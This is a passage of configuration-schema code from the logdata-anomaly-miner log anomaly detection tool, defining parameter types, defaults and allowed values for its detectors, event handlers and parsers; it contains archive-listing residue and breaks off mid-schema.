                'min_variance': {'type': 'float', 'required': False, 'default': 0.98},
                'allow_missing_values': {'type': 'boolean', 'default': False},
                'check_interval': {'type': 'integer', 'default': 3600},
                'realert_interval': {'type': 'integer', 'default': 36000},
                'report_interval': {'type': 'integer', 'default': 10},
                'reset_after_report_flag': {'type': 'boolean', 'default': False},
                'path': {'type': 'string', 'nullable': True, 'default': 'Default'},
                'parallel_check_count': {'type': 'integer', 'required': True, 'default': 10},
                'record_count_before_event': {'type': 'integer', 'default': 1000},
                'use_path_match': {'type': 'boolean', 'default': True},
                'use_value_match': {'type': 'boolean', 'default': True},
                'min_rule_attributes': {'type': 'integer', 'default': 1},
                'max_rule_attributes': {'type': 'integer', 'default': 5},
                'max_hypotheses': {'type': 'integer', 'default': 1000},
                'hypothesis_max_delta_time': {'type': 'float', 'default': 5.0},
                'generation_probability': {'type': 'float', 'default': 1.0},
                'generation_factor': {'type': 'float', 'default': 1.0},
                'max_observations': {'type': 'integer', 'default': 500},
                'p0': {'type': 'float', 'default': 0.9},
                'alpha': {'type': 'float', 'default': 0.05},
                'candidates_size': {'type': 'integer', 'default': 10},
                'hypotheses_eval_delta_time': {'type': 'float', 'default': 120.0},
                'delta_time_to_discard_hypothesis': {'type': 'float', 'default': 180.0},
                'check_rules_flag': {'type': 'boolean', 'default': True},
                'constraint_list': {
                    'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None},
                'ignore_list': {
                    'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None},
                'id_path_list': {'type': 'list', 'default': []},
                'scoring_path_list': {
                    'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None},
                'unique_path_list': {
                    'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None},
                'prob_thresh': {'type': 'float', 'default': 0.05},
                'default_freqs': {'type': 'boolean', 'default': False},
                'skip_repetitions': {'type': 'boolean', 'default': False},
                'seq_len': {'type': 'integer', 'default': 3},
                'timeout': {'type': ['integer', 'float'], 'default': -1},
                'allow_missing_id': {'type': 'boolean', 'default': False},
                'window_size': {'type': ['integer', 'float'], 'default': 600},
                'confidence_factor': {'type': 'float', 'default': 0.33},
                'min_allowed_time_diff': {'type': 'float', 'default': 5.0},
                'lower_limit': {'type': ['integer', 'float']},
                'upper_limit': {'type': ['integer', 'float']},
                'idf': {'type': 'boolean', 'default': False},
                'norm': {'type': 'boolean', 'default': False},
                'add_normal': {'type': 'boolean', 'default': False},
                'check_empty_windows': {'type': 'boolean', 'default': False},
                'bin_size': {'type': 'integer'},
                'bin_count': {'type': 'integer'},
                'outlier_bins_flag': {'type': 'boolean', 'default': False},
                'modulo_value': {'type': 'integer'},
                'time_unit': {'type': 'integer'},
                'histogram_defs': {'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string'}}},
                'bin_definition': {'type': 'string'},
                'tuple_transformation_function': {'type': 'string', 'allowed': ['demo'], 'nullable': True, 'default': None},
                'value_list': {
                    'type': 'list', 'schema': {'type': ['boolean', 'float', 'integer', 'string']}, 'nullable': True, 'default': None},
                'timestamp_path': {'type': 'string', 'nullable': True},
                'min_bin_elements': {'type': 'integer'},
                'min_bin_time': {'type': 'integer'},
                'debug_mode': {'type': 'boolean', 'default': False},
                # skipcq: PYL-W0511
                # TODO check which streams should be allowed
                # Only the two standard streams are accepted; the value is a name, not an arbitrary path.
                'stream': {'type': 'string', 'allowed': ['sys.stdout', 'sys.stderr']},
                'separator': {'type': 'string'},
                'missing_value_string': {'type': 'string'},
                'subhandler_list': {'type': 'list', 'schema': {'type': 'string'}},
                'stop_when_handled_flag': {'type': 'boolean', 'default': False},
                'delete_components': {'type': 'boolean', 'default': True},
                'event_type': {'type': 'string'},
                'event_message': {'type': 'string'},
                'sub_rules': {'type': 'list', 'schema': {'type': 'string'}},
                'sub_rule': {'type': 'string'},
                'match_action': {'type': 'string', 'nullable': True, 'default': None},
                'rule_lookup_dict': {'type': 'dict'},
                'default_rule': {'type': 'string', 'nullable': True, 'default': None},
                'value': {'type': ['boolean', 'float', 'integer', 'string']},
                'regex': {'type': 'string'},
                'seconds_modulo': {'type': 'integer'},
                'limit_lookup_dict': {'type': 'dict', 'valuesrules': {'type': 'list', 'schema': {
                    'type': ['integer', 'float'], 'min': 0}}},
                'default_limit': {'type': 'list', 'schema': {'type': 'integer'}, 'nullable': True, 'default': None},
                'rule_id': {'type': 'string'},
                'min_time_delta': {'type': 'integer'},
                'max_time_delta': {'type': 'integer'},
                'artefact_match_parameters': {'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string'}}, 'nullable': True,
                                              'default': None},
                'action_id': {'type': 'string'},
                'artefact_a_rules': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None},
                'artefact_b_rules': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True, 'default': None},
                'ruleset': {'type': 'list', 'schema': {'type': 'string'}},
                'exit_on_error_flag': {'type': 'boolean', 'default': False},
                'allowlist_rules': {'type': 'list', 'schema': {'type': 'string'}},
                'parsed_atom_handler_lookup_list': {
                    'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string', 'nullable': True}}},
                'default_parsed_atom_handler': {'type': 'string', 'nullable': True, 'default': None},
                'parsed_atom_handler_dict': {'type': 'dict', 'schema': {'id': {'type': 'string'}, 'type': {'type': 'string'}}},
                'min_num_vals': {'type': 'integer', 'default': 1000},
                'max_num_vals': {'type': 'integer', 'default': 1500},
                'save_values': {'type': 'boolean', 'default': True},
                'waiting_time': {'type': 'integer', 'default': 300},
                'num_sections_waiting_time': {'type': 'integer', 'default': 10},
                'event_type_detector': {'type': 'string'},
                'used_gof_test': {'type': 'string', 'allowed': ['CM', 'KS'], 'default': 'CM'},
                'gof_alpha': {'type': 'float', 'default': 0.05},
                's_gof_alpha': {'type': 'float', 'default': 0.05},
                's_gof_bt_alpha': {'type': 'float', 'default': 0.05},
                'd_alpha': {'type': 'float', 'default': 0.1},
                'd_bt_alpha': {'type': 'float', 'default': 0.1},
                'range_alpha': {'type': 'float', 'default': 0.05},
                'dw_alpha': {'type': 'float', 'default': 0.05},
                'div_thres': {'type': 'float', 'default': 0.3},
                'sim_thres': {'type': 'float', 'default': 0.1},
                'indicator_thres': {'type': 'float', 'default': 0.4},
                'num_init': {'type': 'integer', 'default': 100},
                'num_update': {'type': 'integer', 'default': 50},
                'num_update_unq': {'type': 'integer', 'default': 200},
                'num_s_gof_values': {'type': 'integer', 'default': 50},
                'num_s_gof_bt': {'type': 'integer', 'default': 30},
                'num_d_bt': {'type': 'integer', 'default': 30},
                'num_pause_discrete': {'type': 'integer', 'default': 5},
                'num_pause_others': {'type': 'integer', 'default': 2},
                'test_gof_int': {'type': 'boolean', 'default': True},
                # NOTE(review): declared as boolean although the name reads like a count; confirm against the consumer.
                'num_stop_update': {'type': 'boolean', 'default': False},
                'silence_output_without_confidence': {'type': 'boolean', 'default': False},
                'silence_output_except_indicator': {'type': 'boolean', 'default': True},
                'num_var_type_hist_ref': {'type': 'integer', 'default': 10},
                'num_update_var_type_hist_ref': {'type': 'integer', 'default': 10},
                'num_var_type_considered_ind': {'type': 'integer', 'default': 10},
                'num_stat_stop_update': {'type': 'integer', 'default': 200},
                'num_updates_until_var_reduction': {'type': 'integer', 'default': 20},
                'var_reduction_thres': {'type': 'float', 'default': 0.6},
                'num_skipped_ind_for_weights': {'type': 'integer', 'default': 1},
                'num_ind_for_weights': {'type': 'integer', 'default': 100},
                'used_multinomial_test': {'type': 'string', 'allowed': ['Approx', 'MT', 'Chi'], 'default': 'Chi'},
                'use_empiric_distr': {'type': 'boolean', 'default': True},
                'save_statistics': {'type': 'boolean', 'default': True},
                'split_reports_flag': {'type': 'boolean', 'default': False},
                'disc_div_thres': {'type': 'float', 'default': 0.3},
                'num_steps_create_new_rules': {'type': 'integer', 'default': -1},
                'num_upd_until_validation': {'type': 'integer', 'default': 20},
                'num_end_learning_phase': {'type': 'integer', 'default': -1},
                'check_cor_thres': {'type': 'float', 'default': 0.5},
                'check_cor_prob_thres': {'type': 'float', 'default': 1.0},
                'check_cor_num_thres': {'type': 'integer', 'default': 10},
                'min_values_cors_thres': {'type': 'integer', 'default': 5},
                'new_vals_alarm_thres': {'type': 'float', 'default': 3.5},
                'num_bt': {'type': 'integer', 'default': 30},
                'alpha_bt': {'type': 'float', 'default': 0.1},
                'used_homogeneity_test': {'type': 'string', 'allowed': ['Chi', 'MaxDist'], 'default': 'Chi'},
                'used_range_test': {'type': 'string', 'allowed': ['MeanSD', 'EmpiricQuantiles', 'MinMax'], 'default': 'MinMax'},
                'range_threshold': {'type': 'float', 'default': 1},
                'range_limits_factor': {'type': 'float', 'default': 1},
                'num_reinit_range': {'type': 'integer', 'default': 100},
                'alpha_chisquare_test': {'type': 'float', 'default': 0.05},
                'max_dist_rule_distr': {'type': 'float', 'default': 0.1},
                'used_presel_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': [
                    'matchDiscDistr', 'excludeDueDistr', 'matchDiscVals', 'random']}, 'nullable': True, 'default': None},
                'intersect_presel_meth': {'type': 'boolean', 'default': False},
                'percentage_random_cors': {'type': 'float', 'default': 0.20},
                'match_disc_vals_sim_tresh': {'type': 'float', 'default': 0.7},
                'exclude_due_distr_lower_limit': {'type': 'float', 'default': 0.4},
                'match_disc_distr_threshold': {'type': 'float', 'default': 0.5},
                'used_cor_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': ['Rel', 'WRel']}, 'nullable': True, 'default': None},
                'used_validate_cor_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': [
                    'coverVals', 'distinctDistr']}, 'nullable': True, 'default': None},
                'validate_cor_cover_vals_thres': {'type': 'float', 'default': 0.7},
                'validate_cor_distinct_thres': {'type': 'float', 'default': 0.05},
                'time_period_length': {'type': 'integer', 'min': 1, 'required': True, 'default': 86400},
                'max_time_diff': {'type': 'integer', 'min': 1, 'required': True, 'default': 360},
                'num_reduce_time_list': {'type': 'integer', 'min': 1, 'required': True, 'default': 10},
                'output_event_handlers': {'type': 'list', 'nullable': True, 'default': None},
                'suppress': {'type': 'boolean', 'default': False},
                'build_sum_over_values': {'type': 'boolean', 'default': False},
                'num_division_time_step': {'type': 'integer', 'default': 10},
                'num_min_time_history': {'type': 'integer', 'default': 20},
                'num_max_time_history': {'type': 'integer', 'default': 30},
                'num_results_bt': {'type': 'integer', 'default': 15},
                'round_time_interval_threshold': {'type': 'float', 'default': 0.02},
                'acf_threshold': {'type': 'float', 'default': 0.2},
                'acf_pause_interval_percentage': {'type': 'float', 'default': 0.2},
                'acf_auto_pause_interval': {'type': 'boolean', 'default': True},
                'acf_auto_pause_interval_num_min': {'type': 'integer', 'min': 1, 'required': True, 'default': 10},
                'num_log_lines_solidify_matrix': {'type': 'integer', 'default': 10000},
                'time_output_threshold': {'type': 'integer', 'default': 0},
                'anomaly_threshold': {'type': 'float', 'default': 0.05},
                'num_periods_tsa_ini': {'type': 'integer', 'default': 20},
                'allowed_id_tuples': {'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string'}}, 'nullable': True,
                                      'default': None},
                'force_period_length': {'type': 'boolean', 'default': False},
                'set_period_length': {'type': 'integer', 'default': 604800},
                'min_log_lines_per_time_step': {'type': 'integer', 'default': 10},
                'empty_window_warnings': {'type': 'boolean', 'default': True},
                'early_exceeding_anomaly_output': {'type': 'boolean', 'default': False},
                'set_lower_limit': {'type': 'integer', 'min': 0, 'nullable': True, 'default': None},
                'set_upper_limit': {'type': 'integer', 'min': 0, 'nullable': True, 'default': None},
                'local_maximum_threshold': {'type': 'float', 'default': 0.2},
                'combine_values': {'type': 'boolean', 'nullable': True, 'default': True},
            }
        }
    }
}

# EventHandlerNormalisationSchema: defaults and the 'eventhandlertype' coercion for entries of the "EventHandlers" list.
{
    'EventHandlers': {
        'required': False,
        'type': 'list',
        'nullable': True,
        'default': None,
        'schema': {
            'type': 'dict',
            'schema': {
                'id': {'type': 'string', 'required': True},
                'type': {'type': 'eventhandlertype', 'coerce': 'toeventhandlertype', 'required': True},
                'json': {'type': 'boolean', 'default': False},
                'score': {'type': 'boolean', 'default': False},
                'instance_name': {'type': 'string', 'default': 'aminer'},
                'topic': {'type': 'string'},
                # Default endpoint is a local IPC socket; a configured value is accepted as any string.
                'url': {'type': 'string', 'default': 'ipc:///tmp/aminer'},
                'cfgfile': {'type': 'string', 'default': '/etc/aminer/kafka-client.conf'},
                'options': {'type': 'dict', 'schema': {'id': {'type': 'string'}, 'type': {'type': ['string', 'list', 'integer']}}},
                'output_file_path': {'type': 'string'},
                'pretty': {'type': 'boolean', 'default': True},
                'weights': {'type': 'dict', 'nullable': True, 'default': None},
                'auto_weights': {'type': 'boolean', 'default': False},
                'auto_weights_history_length': {'type': 'integer', 'default': 1000, 'min': 1}
            }
        }
    }
}

# ParserNormalisationSchema: defaults and the 'parsermodel' coercion for entries of the "Parser" list.
{
    'Parser': {
        'required': True,
        'type': 'list',
        'has_start': True,
        'schema': {
            'type': 'dict',
            'schema': {
                'id': {'type': 'string', 'required': True},
                'start': {'type': 'boolean'},
                'type': {'type': 'parsermodel', 'coerce': 'toparsermodel', 'required': True},
                'name': {'type': 'string', 'required': True},
                'args': {'type': ['string', 'list'], 'schema': {'type': ['string', 'integer']}, 'nullable': True},
                'branch_model_dict': {'type': 'list', 'schema': {'type': 'dict', 'schema': {'id': {
                    'type': ['boolean', 'float', 'integer', 'string']}, 'model': {'type': 'string'}}}},
                'date_formats': {'type': 'list', 'schema': {'type': 'dict', 'schema': {'format': {'type': 'list', 'schema': {
                    'type': 'string', 'nullable': True}}}}},
                'value_sign_type': {'type': 'string', 'allowed': ['none', 'optional', 'mandatory'], 'default': 'none'},
                'value_pad_type': {'type': 'string', 'allowed': ['none', 'zero', 'blank'], 'default': 'none'},
                'exponent_type': {'type': 'string', 'allowed': ['none', 'optional', 'mandatory'], 'default': 'none'},
                'start_year': {'type': 'integer', 'nullable': True, 'default': None},
                'delimiter': {'type': 'string'},
                'escape': {'type': 'string', 'nullable': True, 'default': None},
                'consume_delimiter': {'type': 'boolean', 'default': False},
                'key_parser_dict': {'type': 'dict'},
                # The two prefixes must differ; ModelElementInterface rejects equal values at construction time.
                'optional_key_prefix': {'type': 'string', 'default': 'optional_key_'},
                'nullable_key_prefix': {'type': 'string', 'default': '+'},
                'strict': {'type': 'boolean', 'default': False},
                'ignore_null': {'type': 'boolean', 'default': True},
                'date_format': {'type': 'string', 'minlength': 2},
                'text_locale': {'type': 'string', 'nullable': True, 'default': None},
                'max_time_jump_seconds': {'type': 'integer', 'default': 86400},
                'timestamp_scale': {'type': 'integer', 'default': 1},
                'allow_all_fields': {'type': 'boolean', 'default': False}
            }
        }
    },
}
'optional_key_'}, 'nullable_key_prefix': {'type': 'string', 'default': '+'}, 'strict': {'type': 'boolean', 'default': False}, 'ignore_null': {'type': 'boolean', 'default': True}, 'date_format': {'type': 'string', 'minlength': 2}, 'text_locale': {'type': 'string', 'nullable': True, 'default': None}, 'max_time_jump_seconds': {'type': 'integer', 'default': 86400}, 'timestamp_scale': {'type': 'integer', 'default': 1}, 'allow_all_fields': {'type': 'boolean', 'default': False} } } }, } logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/validation/000077500000000000000000000000001437606560100327645ustar00rootroot00000000000000AnalysisValidationSchema.py000066400000000000000000001441061437606560100402040ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/validation{ 'Analysis': { 'required': False, 'type': 'list', 'nullable': True, 'schema': { 'type': 'dict', 'allow_unknown': False, 'oneof_schema': [ { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['AllowlistViolationDetector'], 'required': True}, 'allowlist_rules': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MatchPathFilter'], 'required': True}, 'parsed_atom_handler_lookup_list': { 'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string', 'nullable': True}}, 'required': True}, 'default_parsed_atom_handler': {'type': 'string', 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 
'type': {'type': 'string', 'allowed': ['MatchValueFilter'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'parsed_atom_handler_dict': { 'type': 'dict', 'schema': {'id': {'type': 'string'}, 'type': {'type': 'string'}}, 'required': True}, 'default_parsed_atom_handler': {'type': 'string', 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True}, 'type': {'type': 'string', 'allowed': ['PCADetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string'}, 'nullable': True}, 'window_size': {'type': ['integer', 'float'], 'min': 0.001}, 'min_anomaly_score': {'type': 'float'}, 'min_variance': {'type': 'float'}, 'num_windows': {'type': 'float'}, 'persistence_id': {'type': 'string'}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EnhancedNewMatchPathValueComboDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True, 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'allow_missing_values': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'tuple_transformation_function': {'type': 'string', 'allowed': ['demo'], 'nullable': True}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': 
['EventCorrelationDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'max_hypotheses': {'type': 'integer', 'min': 1}, 'hypothesis_max_delta_time': {'type': 'float', 'min': 0.01}, 'generation_probability': {'type': 'float', 'min': 0, 'max': 1}, 'generation_factor': {'type': 'float', 'min': 0, 'max': 1}, 'max_observations': {'type': 'integer', 'min': 1}, 'p0': {'type': 'float', 'min': 0, 'max': 1}, 'alpha': {'type': 'float', 'min': 0, 'max': 1}, 'candidates_size': {'type': 'integer', 'min': 1}, 'hypotheses_eval_delta_time': {'type': 'float', 'min': 0.01}, 'delta_time_to_discard_hypothesis': { 'type': 'float', 'min': 0.01, 'bigger_than_or_equal': ['hypotheses_eval_delta_time', 120.0]}, 'check_rules_flag': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'output_logline': {'type': 'boolean'}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventFrequencyDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'scoring_path_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'unique_path_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'window_size': {'type': ['integer', 'float'], 'min': 0.001}, 'num_windows': {'type': 'integer'}, 'empty_window_warnings': {'type': 'boolean'}, 'early_exceeding_anomaly_output': {'type': 'boolean'}, 'set_lower_limit': {'type': 'integer', 'min': 0, 'nullable': True}, 'set_upper_limit': 
{'type': 'integer', 'min': 0, 'nullable': True}, 'confidence_factor': {'type': 'float', 'min': 0, 'max': 1}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventCountClusterDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'id_path_list': {'type': 'list', 'nullable': True}, 'window_size': {'type': ['integer', 'float'], 'min': 0.001}, 'num_windows': {'type': 'integer'}, 'confidence_factor': {'type': 'float', 'min': 0, 'max': 1}, 'idf': {'type': 'boolean'}, 'norm': {'type': 'boolean'}, 'add_normal': {'type': 'boolean'}, 'check_empty_windows': {'type': 'boolean'}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventSequenceDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'id_path_list': {'type': 'list', 'nullable': True}, 'seq_len': {'type': 'integer', 'min': 1}, 'timeout': {'type': 'integer', 'min': 
-1}, 'allow_missing_id': {'type': 'boolean'}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueRangeDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'id_path_list': {'type': 'list', 'nullable': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['CharsetDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'id_path_list': {'type': 'list', 'nullable': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': 
{'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EntropyDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'prob_thresh': {'type': 'float'}, 'default_freqs': {'type': 'boolean'}, 'skip_repetitions': {'type': 'boolean'}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['EventTypeDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'id_path_list': {'type': 'list', 'nullable': True}, 'allow_missing_id': {'type': 'boolean'}, 'allowed_id_tuples': {'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string'}}, 'nullable': True}, 'min_num_vals': {'type': 'integer', 'min': 1}, 'max_num_vals': {'type': 'integer', 'min': 1, 'bigger_than_or_equal': ['min_num_vals', 1000]}, 'save_values': {'type': 'boolean'}, 'learn_mode': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['SlidingEventFrequencyDetector'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'scoring_path_list': {'type': 'list', 'schema': {'type': 'string', 
'empty': False}, 'nullable': True}, 'window_size': {'type': ['integer', 'float'], 'min': 0.001}, 'set_upper_limit': {'type': 'integer', 'min': 0, 'nullable': True}, 'local_maximum_threshold': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'persistence_id': {'type': 'string', 'empty': False}, 'learn_mode': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['LinearNumericBinDefinition'], 'required': True}, 'lower_limit': {'type': ['integer', 'float'], 'required': True}, 'bin_size': {'type': 'integer', 'required': True, 'min': 1}, 'bin_count': {'type': 'integer', 'required': True, 'min': 1}, 'outlier_bins_flag': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ModuloTimeBinDefinition'], 'required': True}, 'modulo_value': {'type': ['integer', 'float'], 'required': True, 'min': 0.000001}, 'time_unit': {'type': 'integer', 'required': True, 'min': 1}, 'lower_limit': {'type': ['integer', 'float'], 'required': True, 'min': 0}, 'bin_size': {'type': 'integer', 'required': True, 'min': 1}, 'bin_count': {'type': 'integer', 'required': True, 'min': 1}, 'outlier_bins_flag': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 
'allowed': ['HistogramAnalysis'], 'required': True}, 'histogram_defs': { 'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'required': True}, 'report_interval': {'type': 'integer', 'required': True, 'min': 1}, 'reset_after_report_flag': {'type': 'boolean'}, 'persistence_id': {'type': 'string', 'empty': False}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['PathDependentHistogramAnalysis'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'bin_definition': {'type': 'string', 'required': True, 'empty': False}, 'report_interval': {'type': 'integer', 'required': True, 'min': 1}, 'reset_after_report_flag': {'type': 'boolean'}, 'persistence_id': {'type': 'string', 'empty': False}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MatchFilter'], 'required': True}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'value_list': { 'type': 'list', 'schema': {'type': ['boolean', 'float', 'integer', 'string']}, 'nullable': True}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 